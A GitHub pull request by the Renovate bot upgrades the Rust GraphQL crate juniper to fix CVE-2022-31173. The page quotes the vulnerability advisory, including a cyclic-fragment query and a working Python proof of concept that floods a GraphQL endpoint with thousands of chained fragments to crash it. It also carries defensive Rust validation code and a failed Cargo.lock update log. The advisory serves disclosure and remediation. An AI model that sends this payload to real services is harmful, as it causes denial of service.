This repository has been archived by the owner on May 5, 2024. It is now read-only.

Update Rust crate juniper to 0.15.0 [SECURITY] #84

Open: wants to merge 1 commit into base: master

Conversation

renovate[bot]

@renovate renovate bot commented Sep 25, 2022

Mend Renovate

This PR contains the following updates:

Package: juniper (source)
Type: dependencies
Update: minor
Change: 0.14.1 -> 0.15.0

GitHub Vulnerability Alerts

CVE-2022-31173

GraphQL behaviour

Nested fragments in GraphQL might be quite hard to handle depending on the implementation language.
Some languages natively support a maximum recursion depth. However, in most compiled languages, you should add a recursion threshold.

# Infinite loop example
query {
    ...a
}

fragment a on Query {
    ...b
}

fragment b on Query {
    ...a
}

POC TLDR

With max_size being the number of nested fragments generated.
At max_size=7500, it should raise instantly:

However, with a lower size, you will overflow the memory after some iterations.

Reproduction steps (Juniper)

git clone https://github.com/graphql-rust/juniper.git
cd juniper

Save this POC as poc.py

import requests
from itertools import permutations

print('=== Fragments POC ===')

url = 'http://localhost:8080/graphql'

# Number of chained fragment definitions to send.
max_size = 7500
perms = [''.join(p) for p in permutations('abcefghijk')]
perms = perms[:max_size]

# Each fragment spreads the next one; the last spreads the first, closing the cycle.
fragment_payloads = ''
for i, perm in enumerate(perms):
    next_perm = perms[i+1] if i < max_size-1 else perms[0]
    fragment_payloads += f'fragment {perm} on Query{{...{next_perm}}}'

payload = {'query': 'query{\n  ...' + perms[0] + '\n}' + fragment_payloads, 'variables': {}, 'operationName': None}

headers = {
    'Content-Type': 'application/json',
}

try:
    response = requests.request('POST', url, headers=headers, json=payload)
    print(response.text)
except requests.exceptions.ConnectionError:
    print('Connection closed, POC worked.')

cargo run
[in separate shell] python3 poc.py

Credits

@Escape-Technologies

@c3b5aw
@MdotTIM
@karimhreda


Release Notes

graphql-rust/juniper (juniper)

v0.15.10: juniper 0.15.10 (Changelog)
v0.15.9
v0.15.8
v0.15.7
v0.15.6
v0.15.5
v0.15.4
v0.15.3
v0.15.2
v0.15.1
v0.15.0
v0.14.2


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate. View repository job log here.
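The advisory quoted in the Renovate comment above recommends a recursion threshold for nested fragments. As an added example (not code from juniper, from the advisory, or from this repository), here is a standalone Rust check that builds the fragment-spread graph of a GraphQL document and rejects both a spread cycle (the `a`/`b` example) and nesting beyond a configured limit, so a long chain like the one the PoC generates is refused before the walk can recurse deeply; it goes beyond the advisory's case by also handling shared (diamond-shaped) fragments exactly. The scanner only understands the `fragment NAME on TYPE { ... }` shape and is an assumption, not a GraphQL parser.

```rust
use std::collections::HashMap;

/// Map each fragment name to the fragments it spreads (`...name`). A minimal scanner for
/// the `fragment NAME on TYPE { ...x }` shape of the advisory's examples, not a GraphQL parser.
fn fragment_spreads(doc: &str) -> HashMap<String, Vec<String>> {
    let spaced = doc.replace('{', " { ").replace('}', " } "); // braces become their own tokens
    let normalised = format!(" {} ", spaced.split_whitespace().collect::<Vec<_>>().join(" "));
    let mut graph: HashMap<String, Vec<String>> = HashMap::new();
    for def in normalised.split(" fragment ").skip(1) { // each `NAME on TYPE { body }`
        let mut tokens = def.split_whitespace();
        let name = tokens.next().unwrap_or_default().to_string();
        // Named spreads only; an inline `... on Type` has no name and is skipped.
        let spreads = tokens.filter(|t| t.len() > 3 && t.starts_with("...")).map(|t| t[3..].to_string()).collect();
        graph.insert(name, spreads);
    }
    graph
}

/// Depth-first walk that refuses to descend past `max_depth`, so the checker itself cannot be
/// driven into unbounded recursion; `heights` memoises each finished fragment's chain length.
fn walk(name: &str, g: &HashMap<String, Vec<String>>, path: &mut Vec<String>,
        heights: &mut HashMap<String, usize>, max_depth: usize) -> Result<usize, String> {
    if let Some(i) = path.iter().position(|n| n.as_str() == name) {
        return Err(format!("fragment cycle: {} -> {}", path[i..].join(" -> "), name));
    }
    let too_deep = || format!("fragments nested deeper than {max_depth}");
    if path.len() >= max_depth { return Err(too_deep()); }
    let height = match heights.get(name) {
        Some(&h) => h, // already walked once; shared fragments cost nothing extra
        None => {
            path.push(name.to_string());
            let mut h = 1; // a leaf (or undefined) fragment is one level
            for next in g.get(name).into_iter().flatten() {
                h = h.max(1 + walk(next, g, path, heights, max_depth)?);
            }
            path.pop();
            heights.insert(name.to_string(), h);
            h
        }
    };
    if path.len() + height > max_depth { return Err(too_deep()); }
    Ok(height)
}

/// Reject a document whose fragments form a cycle or nest deeper than `max_depth`.
fn validate_fragments(doc: &str, max_depth: usize) -> Result<(), String> {
    let g = fragment_spreads(doc);
    let mut names: Vec<&String> = g.keys().collect();
    names.sort(); // deterministic start order gives reproducible error messages
    let (mut heights, mut path) = (HashMap::new(), Vec::new());
    for name in names { walk(name, &g, &mut path, &mut heights, max_depth)?; }
    Ok(())
}
```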

@renovate renovate bot force-pushed the renovate/crate-juniper-vulnerability branch from c14ec07 to 1764cd9 Compare March 16, 2023 20:06
@renovate renovate bot force-pushed the renovate/crate-juniper-vulnerability branch from 1764cd9 to ff0f2f1 Compare December 6, 2023 14:17
@renovate renovate bot changed the title Update Rust crate juniper to 0.15.10 [SECURITY] Update Rust crate juniper to 0.15.0 [SECURITY] Dec 6, 2023

renovate bot commented Dec 6, 2023

⚠ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: Cargo.lock
Command failed: docker run --rm --name=renovate_a_sidecar --label=renovate_a_child --memory=3584m -v "/tmp/worker/6db155/780fbb/repos/github/bodymindarts/risq":"/tmp/worker/6db155/780fbb/repos/github/bodymindarts/risq" -v "/tmp/worker/6db155/780fbb/cache":"/tmp/worker/6db155/780fbb/cache" -e CONTAINERBASE_CACHE_DIR -w "/tmp/worker/6db155/780fbb/repos/github/bodymindarts/risq" ghcr.io/containerbase/sidecar:9.28.0 bash -l -c "install-tool rust 1.74.0 && cargo update --config net.git-fetch-with-cli=true --manifest-path Cargo.toml --workspace && cargo update --config net.git-fetch-with-cli=true --manifest-path Cargo.toml --package [email protected] --precise 0.15.10"
    Updating crates.io index
      Adding async-trait v0.1.74
      Adding autocfg v1.1.0
      Adding base64 v0.12.3
      Adding bson v1.0.0
      Adding derive_utils v0.11.2
      Adding futures v0.3.29
      Adding futures-channel v0.3.29
      Adding futures-core v0.3.29
      Adding futures-enum v0.1.17
      Adding futures-io v0.3.29
      Adding futures-sink v0.3.29
      Adding futures-task v0.3.29
      Adding futures-util v0.3.29
      Adding graphql-parser v0.3.0
      Adding juniper v0.15.11
      Adding juniper_codegen v0.15.9
      Adding md5 v0.6.1
      Adding pin-project-lite v0.2.13
      Adding pin-utils v0.1.0
      Adding proc-macro-error v1.0.4
      Adding proc-macro-error-attr v1.0.4
    Updating proc-macro2 v1.0.21 -> v1.0.70
    Updating quote v1.0.2 -> v1.0.33
      Adding smartstring v1.0.1
      Adding static_assertions v1.1.0
    Removing syn v1.0.40
      Adding syn v1.0.109
      Adding syn v2.0.39
      Adding thiserror v1.0.50
      Adding thiserror-impl v1.0.50
      Adding unicode-ident v1.0.12
      Adding version_check v0.9.4
    Updating crates.io index
error: failed to select a version for the requirement `juniper = "^0.14"`
candidate versions found which didn't match: 0.15.10
location searched: crates.io index
required by package `juniper-from-schema v0.5.1`
    ... which satisfies dependency `juniper-from-schema = "^0.5.1"` (locked to 0.5.1) of package `risq v0.4.2-dev (/tmp/worker/6db155/780fbb/repos/github/bodymindarts/risq)`
perhaps a crate was updated and forgotten to be re-vendored?
